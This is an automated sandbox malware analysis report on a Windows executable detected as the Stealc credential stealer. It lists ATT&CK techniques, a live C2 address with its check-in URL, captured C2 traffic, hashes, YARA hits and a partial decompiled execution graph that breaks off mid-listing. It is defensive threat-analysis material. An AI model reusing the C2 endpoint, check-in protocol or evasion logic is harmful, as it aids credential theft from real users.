                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/f17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php&17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php/18%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/ctionSettingsafile.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php/file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.php&file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/ffile.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpifile.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpGfile.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpwfile.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1538461
                          Start date and time:2024-10-21 10:46:06 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 47s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 90
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.948934641977069
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'887'232 bytes
                          MD5:6535a50286893f791f119217511acc32
                          SHA1:2155f365670366e0839d7231944930ddf60ea32b
                          SHA256:42944bc940b4e9c0dd2a3f97ab9090005213870edeb8e26fec953afa12140ef2
                          SHA512:ade89712a86c5150d2f4064fed0a31a12b7a0658bc4c6846baa3f4d3ea2d5a3d4178fd58a1caa46a3490226a2352b84c6822f661cfb2f0e62dd32d00156b305a
                          SSDEEP:49152:jpf6Hy/8xXSiXmun5tuQSzbyWANjGij9phd:jpfmI6JXmun5tmzbNKKqh
                          TLSH:6B95337CFFEB6337C576A5FEC286D881261932420254080B05E952926F1BD5F32FAEE4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xab3000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F242902F79Ah
                          rsm
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F2429031795h
                          add byte ptr [ebx], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00h], ah
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800a64bf421faf1d1924280ebc445bceb79unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x2ad0000x200eb906f8f54535840d6ebae5c7015d0a7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          yuntpzro0x50b0000x1a70000x1a6a00f9bfc4d82ec0699f87cbd1077f6e99aaFalse0.9950741505841467data7.954094538527286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          dfroebje0x6b20000x10000x400cd28ddd9dae1f1c0da7b5b4cc67b7e84False0.75data5.903651763239205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6b30000x30000x2200f593cbcc2c3568caff2c7d32749a3842False0.06744025735294118DOS executable (COM)0.7194368073742458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-21T10:46:59.150628+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 21, 2024 10:46:57.961961031 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:46:57.966861010 CEST8049704185.215.113.37192.168.2.5
                          Oct 21, 2024 10:46:57.966948032 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:46:57.967072010 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:46:57.971836090 CEST8049704185.215.113.37192.168.2.5
                          Oct 21, 2024 10:46:58.861968994 CEST8049704185.215.113.37192.168.2.5
                          Oct 21, 2024 10:46:58.862103939 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:46:58.866256952 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:46:58.871134996 CEST8049704185.215.113.37192.168.2.5
                          Oct 21, 2024 10:46:59.150542974 CEST8049704185.215.113.37192.168.2.5
                          Oct 21, 2024 10:46:59.150628090 CEST4970480192.168.2.5185.215.113.37
                          Oct 21, 2024 10:47:01.679208040 CEST4970480192.168.2.5185.215.113.37

                          HTTP Request Dependency Graph

                          • 185.215.113.37

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704185.215.113.3780616C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 21, 2024 10:46:57.967072010 CEST89OUTGET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 21, 2024 10:46:58.861968994 CEST203INHTTP/1.1 200 OK
                          Date: Mon, 21 Oct 2024 08:46:58 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 21, 2024 10:46:58.866256952 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 44 38 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a
                          Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"32D8B7AE39294266498721------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                          Oct 21, 2024 10:46:59.150542974 CEST210INHTTP/1.1 200 OK
                          Date: Mon, 21 Oct 2024 08:46:59 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:04:46:54
                          Start date:21/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x5f0000
                          File size:1'887'232 bytes
                          MD5 hash:6535A50286893F791F119217511ACC32
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:7.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
                            execution_graph 13251 6069f0 13296 5f2260 13251->13296 13275 606a64 13276 60a9b0 4 API calls 13275->13276 13277 606a6b 13276->13277 13278 60a9b0 4 API calls 13277->13278 13279 606a72 13278->13279 13280 60a9b0 4 API calls 13279->13280 13281 606a79 13280->13281 13282 60a9b0 4 API calls 13281->13282 13283 606a80 13282->13283 13448 60a8a0 13283->13448 13285 606b0c 13452 606920 GetSystemTime 13285->13452 13287 606a89 13287->13285 13289 606ac2 OpenEventA 13287->13289 13291 606af5 CloseHandle Sleep 13289->13291 13292 606ad9 13289->13292 13294 606b0a 13291->13294 13295 606ae1 CreateEventA 13292->13295 13294->13287 13295->13285 13649 5f45c0 13296->13649 13298 5f2274 13299 5f45c0 2 API calls 13298->13299 13300 5f228d 13299->13300 13301 5f45c0 2 API calls 13300->13301 13302 5f22a6 13301->13302 13303 5f45c0 2 API calls 13302->13303 13304 5f22bf 13303->13304 13305 5f45c0 2 API calls 13304->13305 13306 5f22d8 13305->13306 13307 5f45c0 2 API calls 13306->13307 13308 5f22f1 13307->13308 13309 5f45c0 2 API calls 13308->13309 13310 5f230a 13309->13310 13311 5f45c0 2 API calls 13310->13311 13312 5f2323 13311->13312 13313 5f45c0 2 API calls 13312->13313 13314 5f233c 13313->13314 13315 5f45c0 2 API calls 13314->13315 13316 5f2355 13315->13316 13317 5f45c0 2 API calls 13316->13317 13318 5f236e 13317->13318 13319 5f45c0 2 API calls 13318->13319 13320 5f2387 13319->13320 13321 5f45c0 2 API calls 13320->13321 13322 5f23a0 13321->13322 13323 5f45c0 2 API calls 13322->13323 13324 5f23b9 13323->13324 13325 5f45c0 2 API calls 13324->13325 13326 5f23d2 13325->13326 13327 5f45c0 2 API calls 13326->13327 13328 5f23eb 13327->13328 13329 5f45c0 2 API calls 13328->13329 13330 5f2404 13329->13330 13331 5f45c0 2 API calls 13330->13331 13332 5f241d 13331->13332 13333 5f45c0 2 API calls 13332->13333 13334 5f2436 13333->13334 13335 5f45c0 2 API calls 13334->13335 13336 5f244f 13335->13336 13337 5f45c0 2 API calls 13336->13337 13338 5f2468 13337->13338 13339 5f45c0 2 API calls 13338->13339 13340 5f2481 13339->13340 13341 5f45c0 2 API calls 13340->13341 13342 5f249a 13341->13342 13343 5f45c0 2 API calls 13342->13343 13344 5f24b3 13343->13344 13345 5f45c0 2 API calls 13344->13345 13346 5f24cc 13345->13346 13347 5f45c0 2 API calls 13346->13347 13348 5f24e5 13347->13348 13349 5f45c0 2 API calls 13348->13349 13350 5f24fe 13349->13350 13351 5f45c0 2 API calls 13350->13351 13352 5f2517 13351->13352 13353 5f45c0 2 API calls 13352->13353 13354 5f2530 13353->13354 13355 5f45c0 2 API calls 13354->13355 13356 5f2549 13355->13356 13357 5f45c0 2 API calls 13356->13357 13358 5f2562 13357->13358 13359 5f45c0 2 API calls 13358->13359 13360 5f257b 13359->13360 13361 5f45c0 2 API calls 13360->13361 13362 5f2594 13361->13362 13363 5f45c0 2 API calls 13362->13363 13364 5f25ad 13363->13364 13365 5f45c0 2 API calls 13364->13365 13366 5f25c6 13365->13366 13367 5f45c0 2 API calls 13366->13367 13368 5f25df 13367->13368 13369 5f45c0 2 API calls 13368->13369 13370 5f25f8 13369->13370 13371 5f45c0 2 API calls 13370->13371 13372 5f2611 13371->13372 13373 5f45c0 2 API calls 13372->13373 13374 5f262a 13373->13374 13375 5f45c0 2 API calls 13374->13375 13376 5f2643 13375->13376 13377 5f45c0 2 API calls 13376->13377 13378 5f265c 13377->13378 13379 5f45c0 2 API calls 13378->13379 13380 5f2675 13379->13380 13381 5f45c0 2 API calls 13380->13381 13382 5f268e 13381->13382 13383 609860 13382->13383 13654 609750 GetPEB 13383->13654 13385 609868 13386 609a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13385->13386 13387 60987a 13385->13387 13388 609af4 GetProcAddress 13386->13388 13389 609b0d 13386->13389 13390 60988c 21 API calls 13387->13390 13388->13389 13391 609b46 13389->13391 13392 609b16 GetProcAddress GetProcAddress 13389->13392 13390->13386 13393 609b68 13391->13393 13394 609b4f GetProcAddress 13391->13394 13392->13391 13395 609b71 GetProcAddress 13393->13395 13396 609b89 13393->13396 13394->13393 13395->13396 13397 606a00 13396->13397 13398 609b92 GetProcAddress GetProcAddress 13396->13398 13399 60a740 13397->13399 13398->13397 13400 60a750 13399->13400 13401 606a0d 13400->13401 13402 60a77e lstrcpy 13400->13402 13403 5f11d0 13401->13403 13402->13401 13404 5f11e8 13403->13404 13405 5f120f ExitProcess 13404->13405 13406 5f1217 13404->13406 13407 5f1160 GetSystemInfo 13406->13407 13408 5f117c ExitProcess 13407->13408 13409 5f1184 13407->13409 13410 5f1110 GetCurrentProcess VirtualAllocExNuma 13409->13410 13411 5f1149 13410->13411 13412 5f1141 ExitProcess 13410->13412 13655 5f10a0 VirtualAlloc 13411->13655 13415 5f1220 13659 6089b0 13415->13659 13418 5f129a 13421 606770 GetUserDefaultLangID 13418->13421 13419 5f1249 13419->13418 13420 5f1292 ExitProcess 13419->13420 13422 606792 13421->13422 13423 6067d3 13421->13423 13422->13423 13424 6067c1 ExitProcess 13422->13424 13425 6067a3 ExitProcess 13422->13425 13426 6067b7 ExitProcess 13422->13426 13427 6067cb ExitProcess 13422->13427 13428 6067ad ExitProcess 13422->13428 13429 5f1190 13423->13429 13430 6078e0 3 API calls 13429->13430 13432 5f119e 13430->13432 13431 5f11cc 13436 607850 GetProcessHeap RtlAllocateHeap GetUserNameA 13431->13436 13432->13431 13433 607850 3 API calls 13432->13433 13434 5f11b7 13433->13434 13434->13431 13435 5f11c4 ExitProcess 13434->13435 13437 606a30 13436->13437 13438 6078e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13437->13438 13439 606a43 13438->13439 13440 60a9b0 13439->13440 13661 60a710 13440->13661 13442 60a9c1 lstrlen 13444 60a9e0 13442->13444 13443 60aa18 13662 60a7a0 13443->13662 13444->13443 13446 60a9fa lstrcpy lstrcat 13444->13446 13446->13443 13447 60aa24 13447->13275 13449 60a8bb 13448->13449 13450 60a90b 13449->13450 13451 60a8f9 lstrcpy 13449->13451 13450->13287 13451->13450 13666 606820 13452->13666 13454 60698e 13455 606998 sscanf 13454->13455 13695 60a800 13455->13695 13457 6069aa SystemTimeToFileTime SystemTimeToFileTime 13458 6069e0 13457->13458 13459 6069ce 13457->13459 13461 605b10 13458->13461 13459->13458 13460 6069d8 ExitProcess 13459->13460 13462 605b1d 13461->13462 13463 60a740 lstrcpy 13462->13463 13464 605b2e 13463->13464 13697 60a820 lstrlen 13464->13697 13467 60a820 2 API calls 13468 605b64 13467->13468 13469 60a820 2 API calls 13468->13469 13470 605b74 13469->13470 13701 606430 13470->13701 13473 60a820 2 API calls 13474 605b93 13473->13474 13475 60a820 2 API calls 13474->13475 13476 605ba0 13475->13476 13477 60a820 2 API calls 13476->13477 13478 605bad 13477->13478 13479 60a820 2 API calls 13478->13479 13480 605bf9 13479->13480 13710 5f26a0 13480->13710 13488 605cc3 13489 606430 lstrcpy 13488->13489 13490 605cd5 13489->13490 13491 60a7a0 lstrcpy 13490->13491 13492 605cf2 13491->13492 13493 60a9b0 4 API calls 13492->13493 13494 605d0a 13493->13494 13495 60a8a0 lstrcpy 13494->13495 13496 605d16 13495->13496 13497 60a9b0 4 API calls 13496->13497 13498 605d3a 13497->13498 13499 60a8a0 lstrcpy 13498->13499 13500 605d46 13499->13500 13501 60a9b0 4 API calls 13500->13501 13502 605d6a 13501->13502 13503 60a8a0 lstrcpy 13502->13503 13504 605d76 13503->13504 13505 60a740 lstrcpy 13504->13505 13506 605d9e 13505->13506 14436 607500 GetWindowsDirectoryA 13506->14436 13509 60a7a0 lstrcpy 13510 605db8 13509->13510 14446 5f4880 13510->14446 13512 605dbe 14591 6017a0 13512->14591 13514 605dc6 13515 60a740 lstrcpy 13514->13515 13516 605de9 13515->13516 13517 5f1590 lstrcpy 13516->13517 13518 605dfd 13517->13518 14607 5f5960 13518->14607 13520 605e03 14751 601050 13520->14751 13522 605e0e 13523 60a740 lstrcpy 13522->13523 13524 605e32 13523->13524 13525 5f1590 lstrcpy 13524->13525 13526 605e46 13525->13526 13527 5f5960 34 API calls 13526->13527 13528 605e4c 13527->13528 14755 600d90 13528->14755 13530 605e57 13531 60a740 lstrcpy 13530->13531 13532 605e79 13531->13532 13533 5f1590 lstrcpy 13532->13533 13534 605e8d 13533->13534 13535 5f5960 34 API calls 13534->13535 13536 605e93 13535->13536 14762 600f40 13536->14762 13538 605e9e 13539 5f1590 lstrcpy 13538->13539 13540 605eb5 13539->13540 14767 601a10 13540->14767 13542 605eba 13543 60a740 lstrcpy 13542->13543 13544 605ed6 13543->13544 15111 5f4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13544->15111 13546 605edb 13547 5f1590 lstrcpy 13546->13547 13548 605f5b 13547->13548 15118 600740 13548->15118 13550 605f60 13551 60a740 lstrcpy 13550->13551 13552 605f86 13551->13552 13553 5f1590 lstrcpy 13552->13553 13554 605f9a 13553->13554 13555 5f5960 34 API calls 13554->13555 13556 605fa0 13555->13556 13650 5f45d1 RtlAllocateHeap 13649->13650 13653 5f4621 VirtualProtect 13650->13653 13653->13298 13654->13385 13656 5f10c2 codecvt 13655->13656 13657 5f10fd 13656->13657 13658 5f10e2 VirtualFree 13656->13658 13657->13415 13658->13657 13660 5f1233 GlobalMemoryStatusEx 13659->13660 13660->13419 13661->13442 13663 60a7c2 13662->13663 13664 60a7ec 13663->13664 13665 60a7da lstrcpy 13663->13665 13664->13447 13665->13664 13667 60a740 lstrcpy 13666->13667 13668 606833 13667->13668 13669 60a9b0 4 API calls 13668->13669 13670 606845 13669->13670 13671 60a8a0 lstrcpy 13670->13671 13672 60684e 13671->13672 13673 60a9b0 4 API calls 13672->13673 13674 606867 13673->13674 13675 60a8a0 lstrcpy 13674->13675 13676 606870 13675->13676 13677 60a9b0 4 API calls 13676->13677 13678 60688a 13677->13678 13679 60a8a0 lstrcpy 13678->13679 13680 606893 13679->13680 13681 60a9b0 4 API calls 13680->13681 13682 6068ac 13681->13682 13683 60a8a0 lstrcpy 13682->13683 13684 6068b5 13683->13684 13685 60a9b0 4 API calls 13684->13685 13686 6068cf 13685->13686 13687 60a8a0 lstrcpy 13686->13687 13688 6068d8 13687->13688 13689 60a9b0 4 API calls 13688->13689 13690 6068f3 13689->13690 13691 60a8a0 lstrcpy 13690->13691 13692 6068fc 13691->13692 13693 60a7a0 lstrcpy 13692->13693 13694 